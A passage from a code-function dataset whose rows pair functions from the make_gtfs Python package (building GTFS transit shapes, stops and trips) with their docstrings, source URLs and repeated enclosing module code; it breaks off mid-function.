repository_name stringclasses 316 values | func_path_in_repository stringlengths 6 223 | func_name stringlengths 1 134 | language stringclasses 1 value | func_code_string stringlengths 57 65.5k | func_documentation_string stringlengths 1 46.3k | split_name stringclasses 1 value | func_code_url stringlengths 91 315 | called_functions listlengths 1 156 ⌀ | enclosing_scope stringlengths 2 1.48M |
|---|---|---|---|---|---|---|---|---|---|
mrcagney/make_gtfs | make_gtfs/main.py | build_shapes | python | def build_shapes(pfeed):
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat']) | Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L106-L137 | null | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_stops(pfeed, shapes=None):
"""
Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
If ``pfeed.stops`` is not ``None``, then return that.
Otherwise, require built shapes output by :func:`build_shapes`,
create one stop at the beginning (the first point) of each shape
and one at the end (the last point) of each shape,
and drop stops with duplicate coordinates.
Note that this will yield one stop for shapes that are loops.
"""
if pfeed.stops is not None:
stops = pfeed.stops.copy()
else:
if shapes is None:
raise ValueError('Must input shapes built by build_shapes()')
geo_shapes = gt.geometrize_shapes(shapes)
rows = []
for shape, geom in geo_shapes[['shape_id',
'geometry']].itertuples(index=False):
stop_ids = build_stop_ids(shape)
stop_names = build_stop_names(shape)
for i in range(2):
stop_id = stop_ids[i]
stop_name = stop_names[i]
stop_lon, stop_lat = geom.interpolate(i,
normalized=True).coords[0]
rows.append([stop_id, stop_name, stop_lon, stop_lat])
stops = (
pd.DataFrame(rows, columns=['stop_id', 'stop_name',
'stop_lon', 'stop_lat'])
.drop_duplicates(subset=['stop_lon', 'stop_lat'])
)
return stops
def build_trips(pfeed, routes, service_by_window):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later.
"""
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id'])
def buffer_side(linestring, side, buffer):
"""
Given a Shapely LineString, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer size in the distance units of
the LineString, buffer the LineString on the given side by
the buffer size and return the resulting Shapely polygon.
"""
b = linestring.buffer(buffer, cap_style=2)
if side in ['left', 'right'] and buffer > 0:
# Make a tiny buffer to split the normal-size buffer
# in half across the linestring
eps = min(buffer/2, 0.001)
b0 = linestring.buffer(eps, cap_style=3)
diff = b.difference(b0)
polys = so.polygonize(diff)
# Buffer sides slightly to include original linestring
if side == 'left':
b = list(polys)[0].buffer(1.1*eps)
else:
b = list(polys)[-1].buffer(1.1*eps)
return b
def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
"""
Given a GeoDataFrame of stops, a Shapely LineString in the
same coordinate system, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer in the distance units of that
coordinate system, do the following.
Return a GeoDataFrame of all the stops that lie within
``buffer`` distance units to the ``side`` of the LineString.
"""
b = buffer_side(linestring, side, buffer)
# Collect stops
return geo_stops.loc[geo_stops.intersects(b)].copy()
def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops.
"""
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g
def build_feed(pfeed, buffer=cs.BUFFER):
# Create Feed tables
agency = build_agency(pfeed)
calendar, service_by_window = build_calendar_etc(pfeed)
routes = build_routes(pfeed)
shapes = build_shapes(pfeed)
stops = build_stops(pfeed, shapes)
trips = build_trips(pfeed, routes, service_by_window)
stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
buffer=buffer)
# Be tidy and remove unused stops
stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
# Create Feed
return gt.Feed(agency=agency, calendar=calendar, routes=routes,
shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
dist_units='km') |
mrcagney/make_gtfs | make_gtfs/main.py | build_stops | python | def build_stops(pfeed, shapes=None):
if pfeed.stops is not None:
stops = pfeed.stops.copy()
else:
if shapes is None:
raise ValueError('Must input shapes built by build_shapes()')
geo_shapes = gt.geometrize_shapes(shapes)
rows = []
for shape, geom in geo_shapes[['shape_id',
'geometry']].itertuples(index=False):
stop_ids = build_stop_ids(shape)
stop_names = build_stop_names(shape)
for i in range(2):
stop_id = stop_ids[i]
stop_name = stop_names[i]
stop_lon, stop_lat = geom.interpolate(i,
normalized=True).coords[0]
rows.append([stop_id, stop_name, stop_lon, stop_lat])
stops = (
pd.DataFrame(rows, columns=['stop_id', 'stop_name',
'stop_lon', 'stop_lat'])
.drop_duplicates(subset=['stop_lon', 'stop_lat'])
)
return stops | Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
If ``pfeed.stops`` is not ``None``, then return that.
Otherwise, require built shapes output by :func:`build_shapes`,
create one stop at the beginning (the first point) of each shape
and one at the end (the last point) of each shape,
and drop stops with duplicate coordinates.
Note that this will yield one stop for shapes that are loops. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L139-L174 | [
"def build_stop_ids(shape_id):\n \"\"\"\n Create a pair of stop IDs based on the given shape ID.\n \"\"\"\n return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]\n",
"def build_stop_names(shape_id):\n \"\"\"\n Create a pair of stop names based on the given shape ID.\n \"\"\"\n ... | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_shapes(pfeed):
"""
Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions.
"""
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat'])
def build_trips(pfeed, routes, service_by_window):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later.
"""
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id'])
def buffer_side(linestring, side, buffer):
"""
Given a Shapely LineString, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer size in the distance units of
the LineString, buffer the LineString on the given side by
the buffer size and return the resulting Shapely polygon.
"""
b = linestring.buffer(buffer, cap_style=2)
if side in ['left', 'right'] and buffer > 0:
# Make a tiny buffer to split the normal-size buffer
# in half across the linestring
eps = min(buffer/2, 0.001)
b0 = linestring.buffer(eps, cap_style=3)
diff = b.difference(b0)
polys = so.polygonize(diff)
# Buffer sides slightly to include original linestring
if side == 'left':
b = list(polys)[0].buffer(1.1*eps)
else:
b = list(polys)[-1].buffer(1.1*eps)
return b
def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
"""
Given a GeoDataFrame of stops, a Shapely LineString in the
same coordinate system, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer in the distance units of that
coordinate system, do the following.
Return a GeoDataFrame of all the stops that lie within
``buffer`` distance units to the ``side`` of the LineString.
"""
b = buffer_side(linestring, side, buffer)
# Collect stops
return geo_stops.loc[geo_stops.intersects(b)].copy()
def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops.
"""
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g
def build_feed(pfeed, buffer=cs.BUFFER):
# Create Feed tables
agency = build_agency(pfeed)
calendar, service_by_window = build_calendar_etc(pfeed)
routes = build_routes(pfeed)
shapes = build_shapes(pfeed)
stops = build_stops(pfeed, shapes)
trips = build_trips(pfeed, routes, service_by_window)
stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
buffer=buffer)
# Be tidy and remove unused stops
stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
# Create Feed
return gt.Feed(agency=agency, calendar=calendar, routes=routes,
shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
dist_units='km') |
mrcagney/make_gtfs | make_gtfs/main.py | build_trips | python | def build_trips(pfeed, routes, service_by_window):
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id']) | Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L176-L225 | [
"def get_duration(timestr1, timestr2, units='s'):\n \"\"\"\n Return the duration of the time period between the first and second\n time string in the given units.\n Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).\n Assume ``timestr1 < timestr2``.\n \"\"\"\n valid_units = ['s', ... | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_shapes(pfeed):
"""
Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions.
"""
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat'])
def build_stops(pfeed, shapes=None):
"""
Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
If ``pfeed.stops`` is not ``None``, then return that.
Otherwise, require built shapes output by :func:`build_shapes`,
create one stop at the beginning (the first point) of each shape
and one at the end (the last point) of each shape,
and drop stops with duplicate coordinates.
Note that this will yield one stop for shapes that are loops.
"""
if pfeed.stops is not None:
stops = pfeed.stops.copy()
else:
if shapes is None:
raise ValueError('Must input shapes built by build_shapes()')
geo_shapes = gt.geometrize_shapes(shapes)
rows = []
for shape, geom in geo_shapes[['shape_id',
'geometry']].itertuples(index=False):
stop_ids = build_stop_ids(shape)
stop_names = build_stop_names(shape)
for i in range(2):
stop_id = stop_ids[i]
stop_name = stop_names[i]
stop_lon, stop_lat = geom.interpolate(i,
normalized=True).coords[0]
rows.append([stop_id, stop_name, stop_lon, stop_lat])
stops = (
pd.DataFrame(rows, columns=['stop_id', 'stop_name',
'stop_lon', 'stop_lat'])
.drop_duplicates(subset=['stop_lon', 'stop_lat'])
)
return stops
def buffer_side(linestring, side, buffer):
"""
Given a Shapely LineString, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer size in the distance units of
the LineString, buffer the LineString on the given side by
the buffer size and return the resulting Shapely polygon.
"""
b = linestring.buffer(buffer, cap_style=2)
if side in ['left', 'right'] and buffer > 0:
# Make a tiny buffer to split the normal-size buffer
# in half across the linestring
eps = min(buffer/2, 0.001)
b0 = linestring.buffer(eps, cap_style=3)
diff = b.difference(b0)
polys = so.polygonize(diff)
# Buffer sides slightly to include original linestring
if side == 'left':
